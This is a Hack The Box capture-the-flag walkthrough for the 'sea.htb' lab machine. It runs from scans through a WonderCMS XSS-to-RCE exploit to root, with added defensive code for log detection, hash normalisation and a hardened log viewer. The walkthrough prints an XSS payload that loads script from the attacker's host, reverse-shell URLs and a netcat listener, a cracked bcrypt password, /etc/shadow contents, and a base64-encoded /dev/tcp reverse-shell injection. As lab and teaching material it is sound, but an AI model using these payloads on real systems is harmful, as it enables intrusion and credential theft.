Hack the box: sea.htb
$ nmap -p- -sCV 10.10.11.28 -T5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-20 14:24 EST
Warning: 10.10.11.28 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.11.28
Host is up (0.070s latency).
Not shown: 55008 closed tcp ports (conn-refused), 10525 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e3:54:e0:72:20:3c:01:42:93:d1:66:9d:90:0c:ab:e8 (RSA)
| 256 f3:24:4b:08:aa:51:9d:56:15:3d:67:56:74:7c:20:38 (ECDSA)
|_ 256 30:b1:05:c6:41:50:ff:22:a3:7f:41:06:0e:67:fd:50 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Sea - Home
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 354.13 seconds
We see a web server hosted there, so I ran nikto just in case. Unfortunately, it did not give us much.
$ upload nikto -C all -url http://10.10.11.28
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.11.28
+ Target Hostname: 10.10.11.28
+ Target Port: 80
+ Start Time: 2024-11-20 14:24:37 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ /: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /home/: This might be interesting.
+ 26612 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2024-11-20 14:42:45 (GMT-5) (1088 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
After running gobuster enumeration several times, I was able to discover the following files under the theme directory, including its version file.
$ 1120_sea.htb gobuster dir --url 'http://sea.htb/themes/bike/' --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://sea.htb/themes/bike/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/home (Status: 200) [Size: 3650]
/img (Status: 301) [Size: 239] [--> http://sea.htb/themes/bike/img/]
/version (Status: 200) [Size: 6]
/css (Status: 301) [Size: 239] [--> http://sea.htb/themes/bike/css/]
/summary (Status: 200) [Size: 66]
/404 (Status: 200) [Size: 3341]
/LICENSE (Status: 200) [Size: 1067]
Details of those files:
$ 1120_sea.htb curl http://sea.htb/themes/bike/version
3.2.0
After the version, we can also obtain the license information.
$ curl http://sea.htb/themes/bike//LICENSE
MIT License
Copyright (c) 2019 turboblack
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
After a quick Google search, we can see that this theme is related to WonderCMS, and that a public XSS to RCE exploit exists for it.
In the script we can see that it tries to download a file from GitHub, which the victim machine cannot reach. So we change that path to point at our own machine, where we host the reverse shell file.
After the script modification, we can see the call is being made. However, even after that I was not able to obtain a reverse shell.
$python3 exploit.py 'http://sea.htb/loginURL' 10.10.14.188 9002
[+] xss.js is created
[+] execute the below command in another terminal
----------------------------
nc -lvp 9002
----------------------------
send the below link to admin:
----------------------------
http://sea.htb/index.php?page=loginURL?"></form><script+src="http://10.10.14.188:8000/xss.js"></script><form+action="
----------------------------
starting HTTP server to allow the access to xss.js
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.28 - - [30/Nov/2024 22:54:06] "GET /xss.js HTTP/1.1" 200 -
10.10.11.28 - - [30/Nov/2024 22:54:14] "GET /revshell-main.zip HTTP/1.1" 200 -
10.10.11.28 - - [30/Nov/2024 22:54:14] "GET /revshell-main.zip HTTP/1.1" 200 -
10.10.11.28 - - [30/Nov/2024 22:54:14] "GET /revshell-main.zip HTTP/1.1" 200 -
10.10.11.28 - - [30/Nov/2024 22:54:14] "GET /revshell-main.zip HTTP/1.1" 200 -
10.10.11.28 - - [30/Nov/2024 23:11:55] "GET /linpeas.sh HTTP/1.1" 200 -
Open a reverse shell listener in another window:
$ nc -nvlp 9002
And in another window, request the URL below:
http://sea.htb//themes/revshell-main/rev.php?lhost=10.10.14.188&lport=9002
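From the defender's side, both steps above leave distinctive entries in the Apache access log: the form-breakout payload with a script sourced from an external host, and a PHP file under the themes tree being called with lhost/lport parameters. The detector below is an added example, not part of the original write-up or of any tool it uses; the sample log lines are constructed and 203.0.113.10 stands in for the attacker address.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Apache combined-log prefix: client, identd, user, [time], "METHOD target PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Markers of the form-breakout payload and of a script pulled from another host
SUSPICIOUS = [
    (re.compile(r'<\s*script', re.I), "script tag in request target"),
    (re.compile(r'<\s*/?\s*form', re.I), "form tag in request target"),
    (re.compile(r'src\s*=\s*["\']?https?://', re.I), "script sourced from an external host"),
]

def analyze_line(line):
    """Return (ip, decoded target, [findings]) or None for a clean or unparsable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = unquote(unquote(m.group("target")))   # decode twice to catch double encoding
    findings = [msg for rx, msg in SUSPICIOUS if rx.search(target)]
    parts = urlsplit(target)
    params = set(parse_qs(parts.query).keys())
    # A PHP file under the themes tree taking lhost/lport is a dropped reverse-shell handler
    if parts.path.endswith(".php") and "/themes/" in parts.path and {"lhost", "lport"} <= params:
        findings.append("php file under themes/ invoked with lhost/lport")
    return (m.group("ip"), target, findings) if findings else None

def scan_log(text):
    """Run analyze_line over every line and keep only the flagged ones."""
    return [hit for hit in map(analyze_line, text.splitlines()) if hit]

# Constructed sample log; 203.0.113.10 is a documentation address standing in for the attacker
SAMPLE_LOG = """\
203.0.113.10 - - [30/Nov/2024:22:53:50 -0500] "GET /index.php?page=home HTTP/1.1" 200 3650 "-" "Mozilla/5.0"
203.0.113.10 - - [30/Nov/2024:22:54:06 -0500] "GET /index.php?page=loginURL?%22%3E%3C/form%3E%3Cscript+src=%22http://203.0.113.10:8000/xss.js%22%3E%3C/script%3E%3Cform+action=%22 HTTP/1.1" 200 1203 "-" "Mozilla/5.0"
203.0.113.10 - - [30/Nov/2024:22:54:20 -0500] "GET /themes/revshell-main/rev.php?lhost=203.0.113.10&lport=9002 HTTP/1.1" 200 12 "-" "curl/8.5.0"
"""

if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, target[:60], findings)
```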
In the web directory we can see a database file that contains a password hash.
"password": "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q",
For some strange reason, if you echo the hash and redirect it into the txt file, hashcat works, but if the hash is pasted into the hashes file and the command is run, nothing is found.
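The hash in the database file is stored as JSON, and JSON is allowed to escape every forward slash as `\/` (the two occurrences above). My assumption for the behaviour described: a pasted value still carries those backslashes, which makes it 61 characters and not a well-formed bcrypt string, so hashcat rejects the line. The helper below is an added example, not from the original post: it parses the JSON so the escapes are decoded, keeps only values that match the bcrypt shape hashcat mode 3200 expects, and shows that the raw pasted form fails that check. The sample file layout and hash value are constructed.

```python
import json
import re

# Shape of a bcrypt string as hashcat mode 3200 expects it: no JSON escapes left in it
BCRYPT_RE = re.compile(r'^\$2[abxy]\$\d{2}\$[./A-Za-z0-9]{53}$')

def looks_like_bcrypt(value):
    """True only for a clean 60-character bcrypt string."""
    return bool(BCRYPT_RE.match(value))

def extract_hashes(db_text, key="password"):
    """Parse the JSON database and collect every value under `key` that is a valid bcrypt hash.
    json.loads turns the escaped "\\/" back into "/", which is the normalisation hashcat needs."""
    found = []
    def walk(node):
        if isinstance(node, dict):
            for k, v in node.items():
                if k == key and isinstance(v, str) and looks_like_bcrypt(v):
                    found.append(v)
                walk(v)
        elif isinstance(node, list):
            for item in node:
                walk(item)
    walk(json.loads(db_text))
    return found

# Constructed fragment in the layout of a WonderCMS database.js; the hash is made up,
# with one "/" in it so the JSON escape is visible
SAMPLE_DB = r'''{
  "config": {
    "siteTitle": "Sea",
    "password": "$2y$10$abcdefghijklmnopqrstuuAbCdEfGhIjK\/MnOpQrStUvWxYz01234",
    "login": "loginURL"
  }
}'''

if __name__ == "__main__":
    raw = re.search(r'"password": "([^"]+)"', SAMPLE_DB).group(1)
    print("pasted as-is, valid bcrypt:", looks_like_bcrypt(raw))   # False: still has "\/"
    for h in extract_hashes(SAMPLE_DB):
        print("normalised:", h, looks_like_bcrypt(h))
```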
$hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-skylake-avx512-AMD Ryzen 9 7900X 12-Core Processor, 6941/13947 MB (2048 MB allocatable), 18MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 0 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q:mychemicalromance
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM...DnXm4q
Time.Started.....: Sun Dec 1 10:51:51 2024 (7 secs)
Time.Estimated...: Sun Dec 1 10:51:58 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 451 H/s (5.36ms) @ Accel:18 Loops:8 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 3240/14344385 (0.02%)
Rejected.........: 0/3240 (0.00%)
Restore.Point....: 2916/14344385 (0.02%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1016-1024
Candidate.Engine.: Device Generator
Candidates.#1....: captain -> kissme1
Started: Sun Dec 1 10:51:32 2024
Stopped: Sun Dec 1 10:51:59 2024
We can now use these credentials to log in to the system as amay.
From further enumeration we can see a service running on localhost port 8080. Since we can SSH into the machine with amay's credentials, we can easily forward that port to the attacker machine and access the service.
Reusing the same password, we can access the portal and change the path to /etc/passwd to view the results.
</form>
systemd-network:*:19430:0:99999:7:::
systemd-resolve:*:19430:0:99999:7:::
systemd-timesync:*:19430:0:99999:7:::
systemd-coredump:!!:19774::::::
amay:$6$S1AGe5ex2k4D5MKa$gTclSeJwvND3FINpZaK0zfUqk6T9IkhlxCn17fNWLx56u.zP/f/4e5YrJRPsM3TRuuKXQDfYL44RyPzduexsm.:19775:0:99999:7:::
<p class='error'>Suspicious traffic patterns detected in /etc/shadow:</p><pre>amay:$6$S1AGe5ex2k4D5MKa$gTclSeJwvND3FINpZaK0zfUqk6T9IkhlxCn17fNWLx56u.zP/f/4e5YrJRPsM3TRuuKXQDfYL44RyPzduexsm.:19775:0:99999:7:::</pre> </div>
It is also possible to inject a command into the system and again get a reverse shell by appending ; and a base64-encoded shell: c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTg4LzkwMDEgMD4mMQ%3D%3D%7Cbase64%20%2Dd%7Cbash
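The portal behaves like a log viewer that hands a user-supplied path to a shell command, which is why both the /etc/passwd read and the ; injection work. As an added example, not the box's monitoring code (the page does not show it), here is the hardened pattern in Python: an allow-list of log names instead of a path, a resolved-path check as defence in depth, and an argv list rather than a shell so ; and | are never interpreted. The directory layout and the use of tail are assumptions.

```python
import subprocess
import tempfile
from pathlib import Path

# Hypothetical allow-list: the user picks a name, never a path
ALLOWED_LOGS = {"access.log", "error.log"}

def safe_log_path(base_dir, requested):
    """Map a user-supplied log name onto a file inside base_dir, or raise ValueError."""
    if requested not in ALLOWED_LOGS:
        # Rejects /etc/passwd, ../ traversal and anything carrying ';' or '|' in one go
        raise ValueError("log not in allow-list: %r" % requested)
    base = Path(base_dir).resolve()
    target = (base / requested).resolve()     # resolve() follows symlinks as well
    if target.parent != base:                 # defence in depth: must stay in base_dir
        raise ValueError("path escapes log directory")
    return target

def tail_log(base_dir, requested, lines=5):
    """Show the last N lines using an argv list: no shell parses the arguments,
    so a value like 'access.log; id' is only ever a (rejected) file name."""
    path = safe_log_path(base_dir, requested)
    result = subprocess.run(["tail", "-n", str(lines), str(path)],
                            capture_output=True, text=True, check=True)
    return result.stdout.splitlines()

def setup_demo_dir():
    """Constructed log directory with ten numbered lines in access.log."""
    d = tempfile.mkdtemp()
    (Path(d) / "access.log").write_text("".join(f"line {i}\n" for i in range(1, 11)))
    return d

if __name__ == "__main__":
    base = setup_demo_dir()
    print(tail_log(base, "access.log", 3))
    for bad in ("../../etc/passwd", "/etc/passwd", "access.log; id"):
        try:
            safe_log_path(base, bad)
        except ValueError as e:
            print("rejected:", e)
```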
We get a shell as root:
root@sea:~/monitoring# cd /root
cd /root
root@sea:~# ll
ll
total 44
drwx------ 7 root root 4096 Dec 1 16:58 ./
drwxr-xr-x 19 root root 4096 Feb 21 2024 ../
lrwxrwxrwx 1 root root 9 Aug 1 12:12 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
drwx------ 2 root root 4096 Aug 14 15:25 .cache/
drwxr-xr-x 2 root root 4096 Feb 25 2024 monitoring/
drwx------ 3 root root 4096 Feb 21 2024 .pki/
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw-r----- 1 root root 33 Dec 1 16:58 root.txt
drwxr-xr-x 2 root root 4096 Aug 1 12:17 scripts/
drwx------ 2 root root 4096 Feb 21 2024 .ssh/
-rw------- 1 root root 797 Aug 5 07:17 .viminfo
root@sea:~# cat root.txt
cat root.txt
<SNIPPED>
root@sea:~#
Thanks for visiting.